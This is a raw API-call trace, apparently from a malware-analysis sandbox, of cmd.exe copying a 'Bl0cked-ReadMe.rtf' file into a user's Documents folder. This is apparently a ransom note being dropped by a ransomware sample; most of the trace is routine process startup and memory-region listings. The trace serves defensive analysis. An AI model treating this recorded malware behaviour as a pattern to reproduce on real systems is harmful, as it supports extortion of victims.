[0140.871] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eed00 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.871] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eece4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eece4*=0x1a) returned 1 [0140.871] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.871] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.871] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.871] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.871] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.871] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.871] SetConsoleInputExeNameW () returned 0x1 [0140.871] GetConsoleOutputCP () returned 0x1b5 [0140.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.872] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.872] exit (_Code=0) Process: id = "159" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xde8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14626 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14627 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14628 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14629 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 14630 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14631 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14632 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14633 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14634 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14635 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15594 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15595 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15596 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15597 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 15598 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 15599 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15600 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15601 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15602 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15603 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15604 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15605 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15606 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15607 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15608 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 15609 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15610 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15611 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15612 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15613 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15614 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15615 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 15616 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 15617 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 216 os_tid = 0x664 [0140.276] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f7e4 | out: lpSystemTimeAsFileTime=0x28f7e4*(dwLowDateTime=0x8d8b8240, dwHighDateTime=0x1d440a9)) [0140.276] GetCurrentProcessId () returned 0xde8 [0140.276] GetCurrentThreadId () returned 0x664 [0140.276] GetTickCount () returned 0x2c0de [0140.276] QueryPerformanceCounter (in: lpPerformanceCount=0x28f7dc | out: lpPerformanceCount=0x28f7dc*=19706489085) returned 1 [0140.276] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.276] __set_app_type (_Type=0x1) [0140.276] __p__fmode () returned 0x76b331f4 [0140.276] __p__commode () returned 0x76b331fc [0140.277] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.277] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.277] GetCurrentThreadId () returned 0x664 [0140.277] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x664) returned 0x38 [0140.277] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.277] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.277] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.277] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.277] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f774 | out: phkResult=0x28f774*=0x0) returned 0x2 [0140.277] VirtualQuery (in: lpAddress=0x28f7ab, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.277] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.277] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.278] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.278] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.278] GetConsoleOutputCP () returned 0x1b5 [0140.278] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.278] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.278] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.278] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.278] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.278] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.278] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.278] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.278] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.278] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.279] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.279] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.279] GetEnvironmentStringsW () returned 0x400180* [0140.279] FreeEnvironmentStringsW (penv=0x400180) returned 1 [0140.279] GetEnvironmentStringsW () returned 0x400180* [0140.279] FreeEnvironmentStringsW (penv=0x400180) returned 1 [0140.279] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6e4 | out: phkResult=0x28e6e4*=0x40) returned 0x0 [0140.279] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0xa8, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.279] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x0, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.280] RegCloseKey (hKey=0x40) returned 0x0 [0140.280] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6e4 | out: phkResult=0x28e6e4*=0x40) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x0, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.280] RegCloseKey (hKey=0x40) returned 0x0 [0140.280] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.280] srand (_Seed=0x5b88636e) [0140.280] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" [0140.280] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" [0140.281] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.281] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.281] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.281] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.281] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.281] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.281] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.281] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.281] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.281] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.281] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.281] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.281] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.281] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.282] GetEnvironmentStringsW () returned 0x4022d0* [0140.282] FreeEnvironmentStringsW (penv=0x4022d0) returned 1 [0140.282] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.282] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.282] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.282] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.282] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.282] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.282] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.282] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.282] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.282] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.282] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f4b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.282] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f4b0, lpFilePart=0x28f4ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f4ac*="Desktop") returned 0x18 [0140.282] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.282] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x400010 [0140.282] FindClose (in: hFindFile=0x400010 | out: hFindFile=0x400010) returned 1 [0140.283] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x400010 [0140.283] FindClose (in: hFindFile=0x400010 | out: hFindFile=0x400010) returned 1 [0140.283] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x400010 [0140.283] FindClose (in: hFindFile=0x400010 | out: hFindFile=0x400010) returned 1 [0140.283] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.283] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.283] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.283] GetEnvironmentStringsW () returned 0x402af0* [0140.283] FreeEnvironmentStringsW (penv=0x402af0) returned 1 [0140.283] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.284] GetConsoleOutputCP () returned 0x1b5 [0140.284] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.284] GetUserDefaultLCID () returned 0x409 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="0") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="0") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="1") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.285] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.286] GetConsoleTitleW (in: lpConsoleTitle=0x3f08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.286] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.287] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.287] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.287] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.287] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.288] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.288] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.288] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.288] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0140.288] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.288] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.292] GetFileType (hFile=0x7) returned 0x2 [0140.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f4e8 | out: lpMode=0x28f4e8) returned 1 [0140.872] _dup (_FileHandle=1) returned 3 [0140.872] _close (_FileHandle=1) returned 0 [0140.873] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.873] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x28f4b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.873] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.873] GetConsoleTitleW (in: lpConsoleTitle=0x28f2e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.873] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.873] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.873] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.873] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.874] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.874] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x28ee4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ee4c) returned 0x3f0e70 [0140.874] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0140.874] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0140.874] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.874] CreateFileW 